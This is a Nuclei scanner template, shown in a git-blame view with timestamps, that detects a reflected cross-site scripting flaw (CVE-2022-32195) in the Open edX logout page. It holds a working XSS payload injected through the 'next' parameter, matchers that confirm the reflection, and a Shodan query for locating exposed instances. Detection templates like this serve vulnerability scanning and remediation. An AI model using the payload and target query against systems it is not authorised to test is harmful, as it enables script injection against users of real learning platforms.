nuclei-templates/cves/2022/CVE-2022-32195.yaml

40 lines
1.0 KiB
YAML
Raw Normal View History

id: CVE-2022-32195
2022-08-06 19:47:02 +00:00
info:
name: Open edX - Cross-site Scripting
author: arafatansari
severity: medium
description: |
Open edX platform before 2022-06-06 allows Reflected Cross-site Scripting via the "next" parameter in the logout URL.
reference:
- https://discuss.openedx.org/t/security-patch-for-logout-page-xss-vulnerability/7408
- https://nvd.nist.gov/vuln/detail/CVE-2022-32195
classification:
cve-id: CVE-2022-32195
2022-08-06 19:47:02 +00:00
metadata:
verified: true
shodan-query: http.html:"Open edX"
comment: Hover the cursor on the redirect link
2022-08-06 20:15:45 +00:00
tags: cve,cve2022,openedx,xss
2022-08-06 19:47:02 +00:00
requests:
- method: GET
path:
2022-08-06 20:15:45 +00:00
- '{{BaseURL}}/logout?next=%208%22onmouseover=%22alert(document.domain)'
2022-08-06 19:47:02 +00:00
matchers-condition: and
matchers:
2022-08-06 20:15:45 +00:00
- type: word
part: body
words:
- '<a href="+8"onmouseover="alert(document.domain)">click here to go to'
2022-08-06 19:47:02 +00:00
- type: word
2022-08-06 20:15:45 +00:00
part: header
2022-08-06 19:47:02 +00:00
words:
2022-08-06 20:15:45 +00:00
- text/html
- type: status
status:
- 200